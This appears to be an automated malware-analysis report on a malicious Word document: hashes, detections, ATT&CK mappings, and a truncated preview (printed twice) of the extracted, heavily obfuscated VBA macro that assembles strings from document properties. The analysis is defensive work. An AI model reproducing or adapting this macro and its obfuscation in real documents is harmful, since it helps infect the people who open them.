Office (OLE) malware analysis — malicious · bb1a67049f2f65ce

MALICIOUS

Office (OLE)

77.5 KB Created: 2017-10-12 06:45:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: 0fc095f4868450c4339b700ac49c32a0 SHA-1: 2af8df8ffa31ced85d0ff3f5bbb19b54501dd7b5 SHA-256: bb1a67049f2f65ce40d68a111becaf0f772754c024013b8d8a869d59472af9eb

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses the AutoOpen function and includes a call to Shell(), indicating an attempt to execute arbitrary commands. This is further supported by the ClamAV detection 'Doc.Macro.DollarShell-6346616-0'. The script is heavily obfuscated, but the presence of Shell() strongly suggests it's designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5424 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5424 bytes
SHA-256: `05a32246251544f34e52e4f6a179b867d5ba1181c918d47f58aab778e87eecce`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub MBnlXtPvZ() hPAWIiQKW = "" + CoofBXsW + HwGhTqAY + IdQBq + vBbEb + "coMments" + CoofBXsW + HwGhTqAY + IdQBq + vBbEb + aplCNw + BotSS + LXPUKGIb + hCZBzj + QwYtr iakAYOknu = Right(Left((psXJQmrtA(hPAWIiQKW)), 2589), 88) VVorrXd = Right(Left((psXJQmrtA(hPAWIiQKW)), 1583), 143) DvPpS = Mid((psXJQmrtA(hPAWIiQKW)), 8512, 143) GWUJXYjICs = Mid((psXJQmrtA(hPAWIiQKW)), 3798, 163) sBkAwII = Mid((psXJQmrtA(hPAWIiQKW)), 9642, 40) HrQjkzbm = Right(Left((psXJQmrtA(hPAWIiQKW)), 8230), 73) ioZiQZzswmf = Right(Left((psXJQmrtA(hPAWIiQKW)), 8956), 85) bNFCTvRhKMR = Mid((psXJQmrtA(hPAWIiQKW)), 11722, 49) EdmbIVrzO = Right(Left((psXJQmrtA(hPAWIiQKW)), 14172), 114) WTaAPLk = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 6402), 75) roSfuHr = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1643), 50) XbHjkU = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 10959), 125) ViKzC = Mid((psXJQmrtA(hPAWIiQKW)), 11151, 45) lfzURRwcaf = Mid((psXJQmrtA(hPAWIiQKW)), 668, 94) KHjAiwi = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 10759), 61) MqiGfJqFhUp = Mid((psXJQmrtA(hPAWIiQKW)), 3165, 195) tPHWbwZzh = Mid((psXJQmrtA(hPAWIiQKW)), 4153, 193) EKwoijwTWmZ = Mid((psXJQmrtA(hPAWIiQKW)), 2847, 71) OlIIWsL = Mid((psXJQmrtA(hPAWIiQKW)), 2178, 64) iNRsHWmQAf = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1102), 82) BVKBbAVWFt = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 7402), 67) qIqoRdop = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1260), 176) flXlYbj = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 13534), 192) uAfMPzHurp = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 4777), 25) kssBwjzzX = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 5980), 171) mmpZdqbtpAH = Mid((psXJQmrtA(hPAWIiQKW)), 12549, 11) LwarKiwA = Right(Left((psXJQmrtA(hPAWIiQKW)), 3153), 82) vsfjavjFP = Right(Left((psXJQmrtA(hPAWIiQKW)), 7962), 39) taZYd = Right(Left((psXJQmrtA(hPAWIiQKW)), 5729), 186) vlidSTq = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14351), 62) Gpouz = Right(Left((psXJQmrtA(hPAWIiQKW)), 6323), 59) ujwGB = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 7009), 113) usXYR = Mid((psXJQmrtA(hPAWIiQKW)), 5301, 192) SjijE = Mid((psXJQmrtA(hPAWIiQKW)), 10306, 183) RaMtYqcPaJB = Right(Left((psXJQmrtA(hPAWIiQKW)), 7719), 109) fsfzOzi = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 13063), 76) uuYjEoIJNu = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 12354), 165) cFmNd = Right(Left((psXJQmrtA(hPAWIiQKW)), 2012), 95) iROWmBVaB = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14663), 197) UslWqXAS = iakAYOknu + VVorrXd + DvPpS + GWUJXYjICs + sBkAwII + HrQjkzbm + ioZiQZzswmf + bNFCTvRhKMR + EdmbIVrzO + WTaAPLk + roSfuHr + XbHjkU + ViKzC + lfzURRwcaf + KHjAiwi + MqiGfJqFhUp + tPHWbwZzh + EKwoijwTWmZ + OlIIWsL + iNRsHWmQAf + BVKBbAVWFt + qIqoRdop + flXlYbj + uAfMPzHurp + kssBwjzzX + mmpZdqbtpAH + LwarKiwA + vsfjavjFP + taZYd + vlidSTq + Gpouz + ujwGB + usXYR + SjijE + RaMtYqcPaJB + fsfzOzi + uuYjEoIJNu + cFmNd + iROWmBVaB SoIwiSIBMz = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 15187), 2) NCazoBUlS = Right(Left((psXJQmrtA(hPAWIiQKW)), 4982), 165) YszTJl = Right(Left((psXJQmrtA(hPAWIiQKW)), 14049), 13) IEsQZz = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14420), 138) TKujab = Mid((psXJQmrtA(hPAWIiQKW)), 9434, 77) TPYLRvwU = Mid((psXJQmrtA(hPAWIiQKW)), 6556, 81) jEizzQsl = Mid((psXJQmrtA(hPAWIiQKW)), 4427, 186) bXXmw = UslWqXAS + SoIwiSIBMz + NCazoBUlS + YszTJl + IEsQZz + TKujab + TPYLRvwU + jEizzQs ... (truncated)

SHA-256: 05a32246251544f34e52e4f6a179b867d5ba1181c918d47f58aab778e87eecce

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub MBnlXtPvZ()
hPAWIiQKW = "" + CoofBXsW + HwGhTqAY + IdQBq + vBbEb + "coMments" + CoofBXsW + HwGhTqAY + IdQBq + vBbEb + aplCNw + BotSS + LXPUKGIb + hCZBzj + QwYtr
iakAYOknu = Right(Left((psXJQmrtA(hPAWIiQKW)), 2589), 88)
VVorrXd = Right(Left((psXJQmrtA(hPAWIiQKW)), 1583), 143)
DvPpS = Mid((psXJQmrtA(hPAWIiQKW)), 8512, 143)
GWUJXYjICs = Mid((psXJQmrtA(hPAWIiQKW)), 3798, 163)
sBkAwII = Mid((psXJQmrtA(hPAWIiQKW)), 9642, 40)
HrQjkzbm = Right(Left((psXJQmrtA(hPAWIiQKW)), 8230), 73)
ioZiQZzswmf = Right(Left((psXJQmrtA(hPAWIiQKW)), 8956), 85)
bNFCTvRhKMR = Mid((psXJQmrtA(hPAWIiQKW)), 11722, 49)
EdmbIVrzO = Right(Left((psXJQmrtA(hPAWIiQKW)), 14172), 114)
WTaAPLk = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 6402), 75)
roSfuHr = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1643), 50)
XbHjkU = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 10959), 125)
ViKzC = Mid((psXJQmrtA(hPAWIiQKW)), 11151, 45)
lfzURRwcaf = Mid((psXJQmrtA(hPAWIiQKW)), 668, 94)
KHjAiwi = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 10759), 61)
MqiGfJqFhUp = Mid((psXJQmrtA(hPAWIiQKW)), 3165, 195)
tPHWbwZzh = Mid((psXJQmrtA(hPAWIiQKW)), 4153, 193)
EKwoijwTWmZ = Mid((psXJQmrtA(hPAWIiQKW)), 2847, 71)
OlIIWsL = Mid((psXJQmrtA(hPAWIiQKW)), 2178, 64)
iNRsHWmQAf = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1102), 82)
BVKBbAVWFt = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 7402), 67)
qIqoRdop = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1260), 176)
flXlYbj = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 13534), 192)
uAfMPzHurp = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 4777), 25)
kssBwjzzX = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 5980), 171)
mmpZdqbtpAH = Mid((psXJQmrtA(hPAWIiQKW)), 12549, 11)
LwarKiwA = Right(Left((psXJQmrtA(hPAWIiQKW)), 3153), 82)
vsfjavjFP = Right(Left((psXJQmrtA(hPAWIiQKW)), 7962), 39)
taZYd = Right(Left((psXJQmrtA(hPAWIiQKW)), 5729), 186)
vlidSTq = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14351), 62)
Gpouz = Right(Left((psXJQmrtA(hPAWIiQKW)), 6323), 59)
ujwGB = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 7009), 113)
usXYR = Mid((psXJQmrtA(hPAWIiQKW)), 5301, 192)
SjijE = Mid((psXJQmrtA(hPAWIiQKW)), 10306, 183)
RaMtYqcPaJB = Right(Left((psXJQmrtA(hPAWIiQKW)), 7719), 109)
fsfzOzi = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 13063), 76)
uuYjEoIJNu = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 12354), 165)
cFmNd = Right(Left((psXJQmrtA(hPAWIiQKW)), 2012), 95)
iROWmBVaB = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14663), 197)
UslWqXAS = iakAYOknu + VVorrXd + DvPpS + GWUJXYjICs + sBkAwII + HrQjkzbm + ioZiQZzswmf + bNFCTvRhKMR + EdmbIVrzO + WTaAPLk + roSfuHr + XbHjkU + ViKzC + lfzURRwcaf + KHjAiwi + MqiGfJqFhUp + tPHWbwZzh + EKwoijwTWmZ + OlIIWsL + iNRsHWmQAf + BVKBbAVWFt + qIqoRdop + flXlYbj + uAfMPzHurp + kssBwjzzX + mmpZdqbtpAH + LwarKiwA + vsfjavjFP + taZYd + vlidSTq + Gpouz + ujwGB + usXYR + SjijE + RaMtYqcPaJB + fsfzOzi + uuYjEoIJNu + cFmNd + iROWmBVaB
SoIwiSIBMz = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 15187), 2)
NCazoBUlS = Right(Left((psXJQmrtA(hPAWIiQKW)), 4982), 165)
YszTJl = Right(Left((psXJQmrtA(hPAWIiQKW)), 14049), 13)
IEsQZz = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14420), 138)
TKujab = Mid((psXJQmrtA(hPAWIiQKW)), 9434, 77)
TPYLRvwU = Mid((psXJQmrtA(hPAWIiQKW)), 6556, 81)
jEizzQsl = Mid((psXJQmrtA(hPAWIiQKW)), 4427, 186)
bXXmw = UslWqXAS + SoIwiSIBMz + NCazoBUlS + YszTJl + IEsQZz + TKujab + TPYLRvwU + jEizzQs
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.